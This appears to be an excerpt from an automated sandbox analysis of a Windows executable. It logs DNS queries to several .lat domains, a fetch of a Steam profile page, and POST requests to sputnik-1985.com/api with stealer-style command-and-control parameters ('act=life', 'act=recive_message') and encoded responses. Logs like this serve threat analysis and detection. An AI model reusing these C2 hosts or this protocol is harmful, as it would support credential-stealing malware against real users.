                                                                                                                                                                                                            Jan 10, 2025 11:36:09.603127956 CET1.1.1.1192.168.2.30x62e9Name error (3)slipperyloo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.617432117 CET1.1.1.1192.168.2.30xc69aName error (3)manyrestro.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.628998995 CET1.1.1.1192.168.2.30x620bName error (3)shapestickyr.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.640355110 CET1.1.1.1192.168.2.30x5248Name error (3)talkynicer.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.652705908 CET1.1.1.1192.168.2.30xda33Name error (3)curverpluch.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.667207003 CET1.1.1.1192.168.2.30x2eecName error (3)tentabatte.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.678167105 CET1.1.1.1192.168.2.30xbc5cName error (3)bashfulacid.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.687452078 CET1.1.1.1192.168.2.30x6844No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.096344948 CET1.1.1.1192.168.2.30x5a4No error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.096344948 CET1.1.1.1192.168.2.30x5a4No error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.096344948 CET1.1.1.1192.168.2.30x5a4No error (0)sputnik-1985.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.096344948 CET1.1.1.1192.168.2.30x5a4No error (0)sputnik-1985.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.096344948 CET1.1.1.1192.168.2.30x5a4No error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.096344948 CET1.1.1.1192.168.2.30x5a4No error (0)sputnik-1985.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.096344948 CET1.1.1.1192.168.2.30x5a4No error (0)sputnik-1985.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.673310041 CET1.1.1.1192.168.2.30x12aeName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:37.884334087 CET1.1.1.1192.168.2.30x5cbeName error (3)50.23.12.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                            • sputnik-1985.com

                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.349745104.102.49.2544437512C:\Users\user\Desktop\filename.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:36:10 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                            2025-01-10 10:36:10 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:10 GMT
                                                                                                                                                                                                            Content-Length: 35126
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: sessionid=0d83e256c371627a690beca1; Path=/; Secure; SameSite=None
                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                            2025-01-10 10:36:10 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                            2025-01-10 10:36:10 UTC16384INData Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
                                                                                                                                                                                                            Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
                                                                                                                                                                                                            2025-01-10 10:36:10 UTC3768INData Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
                                                                                                                                                                                                            Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                                                                                            2025-01-10 10:36:10 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                            Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.349754104.21.48.14437512C:\Users\user\Desktop\filename.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:36:11 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:36:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:11 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=l9iemacd7re0804br8hgkbvslq; expires=Tue, 06 May 2025 04:22:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VdKKFVBJb30Lkd4GeZd7XYmqXHUTrNnU0V25h6xn6cu0sFjVGjgyvlyGZ%2BJAIKkZk4O9stCAanu%2F37ypjkHYxeSdjIYlQlny65JZ%2BWZCOh4SKQBl4YB2opaA2CYW%2B2p%2BmD98"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc064cd94d42e9-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1715&rtt_var=656&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1650650&cwnd=240&unsent_bytes=0&cid=8bad0ec50fb1f3fb&ts=446&x=0"
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.349762104.21.48.14437512C:\Users\user\Desktop\filename.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 86
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:12 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=l30klo57sfc9ikqrd8tbmdctc0; expires=Tue, 06 May 2025 04:22:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F9zgYnO5h6bFhjkX6vI9Yy%2F7qDLeez0uRMyYPPPfWZW4%2FJVjDJPEV89%2BqllJ%2F%2Bgb1dSFMhrTOQTqLor60%2FMlSg3dIIi4bSfnXqKz7h%2Fj8%2FJutoYBSeJD6dXl3GnhWzAPDzV2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc0652bb2ac323-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1462&min_rtt=1454&rtt_var=562&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1918528&cwnd=214&unsent_bytes=0&cid=2cdcc3c7a92554a2&ts=462&x=0"
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC238INData Raw: 63 35 64 0d 0a 45 38 36 63 32 71 7a 69 67 62 77 70 31 74 6c 44 52 4b 50 61 4e 67 4f 64 76 68 4d 38 72 63 52 46 44 4f 68 55 6f 42 63 35 5a 79 4e 6f 37 4f 72 34 6c 74 61 74 6e 6c 71 7a 2b 33 6b 69 77 72 5a 46 5a 72 47 63 63 6c 69 50 2f 69 4e 74 68 43 66 46 4f 78 73 52 54 6a 48 30 2b 72 76 41 6b 65 53 51 43 37 4f 68 59 58 37 34 6f 52 52 6d 38 35 77 70 48 73 69 75 4a 32 32 45 4e 73 46 38 56 68 64 50 63 4b 62 77 76 63 53 48 34 74 68 49 75 72 51 6d 49 63 61 37 58 47 33 30 30 33 74 52 6a 2b 68 6e 61 5a 4a 32 6d 6a 56 30 41 6c 64 79 67 2f 32 70 78 38 44 38 6b 46 4c 30 76 43 31 6d 6d 66 68 58 5a 76 2f 53 64 56 6a 47 72 43 31 6b 6a 44 66 45 66 55 6b 4f 52 58 75 6d 2f 72 37 46 6a 65 76 4d 52 62 43 7a 4c 53 66 4d 75
                                                                                                                                                                                                            Data Ascii: c5dE86c2qzigbwp1tlDRKPaNgOdvhM8rcRFDOhUoBc5ZyNo7Or4ltatnlqz+3kiwrZFZrGccliP/iNthCfFOxsRTjH0+rvAkeSQC7OhYX74oRRm85wpHsiuJ22ENsF8VhdPcKbwvcSH4thIurQmIca7XG3003tRj+hnaZJ2mjV0Aldyg/2px8D8kFL0vC1mmfhXZv/SdVjGrC1kjDfEfUkORXum/r7FjevMRbCzLSfMu
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC1369INData Raw: 78 51 76 76 39 74 70 48 70 66 6d 64 46 79 4a 4a 39 4e 67 56 68 56 48 4d 62 4f 77 6f 59 36 48 37 35 34 54 39 4c 4d 74 4b 4d 53 37 57 32 62 2b 33 47 4e 52 7a 36 55 76 5a 6f 34 38 7a 58 70 55 43 30 74 32 70 50 65 2f 77 59 66 72 32 45 53 33 2b 32 39 6d 78 71 41 55 4f 62 2f 38 59 56 33 4d 73 69 70 2f 79 69 6d 4d 62 42 73 43 54 54 48 30 76 72 37 41 67 65 37 65 57 62 79 77 4b 69 50 54 73 31 31 73 38 74 78 38 56 4d 43 6c 4a 32 6d 41 50 4d 31 2f 58 77 68 4d 64 36 7a 2b 2b 49 44 41 35 4d 59 4c 37 50 73 43 49 39 47 2f 57 48 65 39 35 6a 46 42 67 62 39 6e 61 59 5a 32 6d 6a 56 54 41 45 4a 79 70 2f 47 37 78 6f 76 78 33 6c 6d 79 74 69 51 30 78 37 31 61 61 2f 7a 4f 65 31 44 4a 70 53 35 6c 67 7a 50 46 63 52 74 4c 41 58 61 30 76 75 43 4f 6f 65 37 56 52 37 36 73 49 57 62 65
                                                                                                                                                                                                            Data Ascii: xQvv9tpHpfmdFyJJ9NgVhVHMbOwoY6H754T9LMtKMS7W2b+3GNRz6UvZo48zXpUC0t2pPe/wYfr2ES3+29mxqAUOb/8YV3Msip/yimMbBsCTTH0vr7Age7eWbywKiPTs11s8tx8VMClJ2mAPM1/XwhMd6z++IDA5MYL7PsCI9G/WHe95jFBgb9naYZ2mjVTAEJyp/G7xovx3lmytiQ0x71aa/zOe1DJpS5lgzPFcRtLAXa0vuCOoe7VR76sIWbe
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC1369INData Raw: 33 57 63 56 62 4b 70 79 31 6b 79 6e 69 43 63 6b 4e 46 47 54 47 64 36 62 4f 4d 74 65 44 51 52 62 4f 74 59 54 6d 50 6f 52 52 6d 38 35 77 70 48 73 4b 75 49 6d 75 46 4e 38 68 37 58 67 39 4e 65 61 4c 39 71 73 47 45 34 39 4a 44 76 72 59 76 49 73 6d 78 58 32 72 35 33 48 42 55 6a 2b 68 6e 61 5a 4a 32 6d 6a 56 76 41 6b 31 38 6f 37 79 4e 7a 59 37 74 32 56 33 30 70 47 38 2f 67 62 39 59 49 61 65 63 66 56 66 50 72 53 31 71 69 6a 48 50 63 46 67 43 51 6e 79 72 39 4c 62 4a 68 4f 2f 58 52 72 4b 37 4a 69 4c 45 71 6c 46 6f 38 39 41 78 45 49 2b 68 50 79 37 53 64 75 31 79 54 51 5a 75 63 72 33 33 2b 4e 48 4f 2b 70 35 4d 75 50 74 35 5a 73 61 39 58 47 72 35 31 48 46 4d 79 71 67 73 62 34 41 77 77 33 68 58 41 30 46 77 72 50 69 30 7a 6f 66 6b 7a 46 6d 78 76 54 4d 73 67 66 59 55 5a
                                                                                                                                                                                                            Data Ascii: 3WcVbKpy1kyniCckNFGTGd6bOMteDQRbOtYTmPoRRm85wpHsKuImuFN8h7Xg9NeaL9qsGE49JDvrYvIsmxX2r53HBUj+hnaZJ2mjVvAk18o7yNzY7t2V30pG8/gb9YIaecfVfPrS1qijHPcFgCQnyr9LbJhO/XRrK7JiLEqlFo89AxEI+hPy7Sdu1yTQZucr33+NHO+p5MuPt5Zsa9XGr51HFMyqgsb4Aww3hXA0FwrPi0zofkzFmxvTMsgfYUZ
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC196INData Raw: 65 79 4b 70 6e 4e 73 6f 31 7a 58 78 55 44 55 6c 2b 6f 2f 71 32 79 49 62 75 32 30 53 2b 71 53 6b 6f 7a 4c 4e 62 61 75 33 63 66 46 72 44 6f 69 39 6c 67 48 61 4d 4e 56 77 64 41 53 6e 73 79 37 58 42 67 4f 44 49 43 36 76 31 4f 47 62 47 74 42 51 35 76 39 42 2f 58 73 43 71 4b 32 57 43 4e 38 35 37 58 41 42 49 65 61 54 73 75 63 71 49 34 74 42 45 74 62 38 6b 49 38 57 2f 55 47 66 77 6e 44 38 65 79 4c 35 6e 4e 73 6f 5a 35 55 41 5a 4a 48 73 78 73 37 43 68 6a 6f 66 76 6e 68 50 30 74 79 49 71 79 62 64 53 61 50 50 57 65 46 58 44 72 53 4e 69 67 7a 50 45 64 46 34 41 51 48 57 67 39 4c 37 4e 67 0d 0a
                                                                                                                                                                                                            Data Ascii: eyKpnNso1zXxUDUl+o/q2yIbu20S+qSkozLNbau3cfFrDoi9lgHaMNVwdASnsy7XBgODIC6v1OGbGtBQ5v9B/XsCqK2WCN857XABIeaTsucqI4tBEtb8kI8W/UGfwnD8eyL5nNsoZ5UAZJHsxs7ChjofvnhP0tyIqybdSaPPWeFXDrSNigzPEdF4AQHWg9L7Ng
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC1369INData Raw: 33 36 61 66 0d 0a 2b 7a 52 52 4c 7a 37 62 32 62 47 6f 42 51 35 76 2f 6c 6d 56 63 47 67 5a 33 48 45 4c 34 4a 79 56 30 55 5a 4d 61 44 33 76 73 69 46 37 39 39 4e 76 4c 34 70 49 73 43 2b 55 6d 4c 77 32 48 52 66 77 4b 49 72 59 49 41 33 77 33 6c 51 43 6b 70 30 37 4c 44 34 79 5a 69 6a 68 67 75 46 75 44 63 78 30 62 51 55 66 72 48 46 4d 56 6e 44 35 6e 38 75 69 79 54 49 66 31 55 41 54 6e 53 76 38 62 2f 44 68 75 2f 55 51 72 79 39 4c 69 2f 54 75 31 68 76 2b 4e 4a 39 55 4d 4b 73 4a 47 50 4b 65 49 4a 79 51 30 55 5a 4d 59 44 35 74 65 43 4c 37 39 6b 4c 71 2f 55 34 5a 73 61 30 46 44 6d 2f 30 48 74 53 78 71 59 75 61 34 49 39 79 33 42 61 44 6b 52 79 71 76 4f 33 78 35 4c 70 33 55 57 33 74 79 30 67 77 4c 74 47 61 66 61 63 50 78 37 49 76 6d 63 32 79 68 66 4d 65 45 38 43 55 54
                                                                                                                                                                                                            Data Ascii: 36af+zRRLz7b2bGoBQ5v/lmVcGgZ3HEL4JyV0UZMaD3vsiF799NvL4pIsC+UmLw2HRfwKIrYIA3w3lQCkp07LD4yZijhguFuDcx0bQUfrHFMVnD5n8uiyTIf1UATnSv8b/Dhu/UQry9Li/Tu1hv+NJ9UMKsJGPKeIJyQ0UZMYD5teCL79kLq/U4Zsa0FDm/0HtSxqYua4I9y3BaDkRyqvO3x5Lp3UW3ty0gwLtGafacPx7Ivmc2yhfMeE8CUT
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC1369INData Raw: 78 49 6e 6b 31 6b 79 33 71 57 46 6f 67 62 39 4d 49 61 65 63 57 46 6e 64 71 44 63 75 6c 58 6a 62 4e 56 77 4a 41 53 6e 73 2b 72 4c 42 68 4f 54 53 54 62 47 39 4c 43 66 4f 75 56 52 75 2b 39 64 34 57 4d 36 72 49 6d 4f 4f 4a 4d 68 2b 56 41 6c 49 66 61 47 2b 39 6f 36 48 2b 35 34 54 39 49 6f 73 4b 4d 2b 2f 51 69 48 67 6b 6d 67 65 79 4b 70 6e 4e 73 6f 33 7a 6e 70 59 43 6b 4a 79 72 66 53 71 33 49 7a 71 31 6b 36 34 73 43 38 67 30 37 35 62 61 50 7a 66 65 46 6e 48 71 69 31 74 6a 58 61 4d 4e 56 77 64 41 53 6e 73 33 61 2f 65 6a 61 50 42 42 61 33 37 4a 69 71 42 34 42 52 70 38 74 52 37 57 73 69 72 49 47 69 44 4a 4d 74 77 56 51 56 46 65 71 50 34 76 4d 32 41 38 64 68 50 76 4c 67 73 4b 38 2b 37 55 43 47 78 6e 48 5a 47 6a 2f 35 6e 58 49 63 34 32 58 70 63 46 45 73 78 73 37 43
                                                                                                                                                                                                            Data Ascii: xInk1ky3qWFogb9MIaecWFndqDculXjbNVwJASns+rLBhOTSTbG9LCfOuVRu+9d4WM6rImOOJMh+VAlIfaG+9o6H+54T9IosKM+/QiHgkmgeyKpnNso3znpYCkJyrfSq3Izq1k64sC8g075baPzfeFnHqi1tjXaMNVwdASns3a/ejaPBBa37JiqB4BRp8tR7WsirIGiDJMtwVQVFeqP4vM2A8dhPvLgsK8+7UCGxnHZGj/5nXIc42XpcFEsxs7C
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC1369INData Raw: 64 68 50 73 62 30 72 49 38 47 7a 56 32 37 37 32 6e 56 52 7a 36 30 75 62 34 77 7a 79 48 35 64 43 45 4a 33 71 72 37 32 6a 6f 66 37 6e 68 50 30 6d 7a 6f 72 7a 62 38 55 66 72 48 46 4d 56 6e 44 35 6e 38 75 67 54 72 47 63 6c 73 49 51 6e 6d 70 2b 72 4c 4c 67 4f 76 4d 51 37 53 38 4d 7a 54 42 73 56 46 74 2f 4e 78 31 57 4d 61 67 4a 47 72 4b 65 49 4a 79 51 30 55 5a 4d 59 48 79 76 2b 65 48 2b 4a 35 55 2b 71 4a 68 49 63 33 34 44 43 48 2b 31 33 74 52 77 71 55 68 62 59 45 7a 79 48 52 63 44 55 78 6a 72 2f 47 33 79 6f 44 73 32 45 32 31 74 43 63 68 79 4c 6c 63 5a 72 2b 53 4d 56 6e 58 35 6e 38 75 70 44 48 42 63 52 73 61 44 32 6a 73 2b 62 53 4f 32 4b 50 65 51 62 36 78 4c 79 62 47 71 6c 4a 6f 2f 39 39 6a 58 63 6d 75 49 57 4b 47 4f 38 70 38 57 77 42 4b 66 4b 66 7a 76 73 36 4c
                                                                                                                                                                                                            Data Ascii: dhPsb0rI8GzV2772nVRz60ub4wzyH5dCEJ3qr72jof7nhP0mzorzb8UfrHFMVnD5n8ugTrGclsIQnmp+rLLgOvMQ7S8MzTBsVFt/Nx1WMagJGrKeIJyQ0UZMYHyv+eH+J5U+qJhIc34DCH+13tRwqUhbYEzyHRcDUxjr/G3yoDs2E21tCchyLlcZr+SMVnX5n8upDHBcRsaD2js+bSO2KPeQb6xLybGqlJo/99jXcmuIWKGO8p8WwBKfKfzvs6L
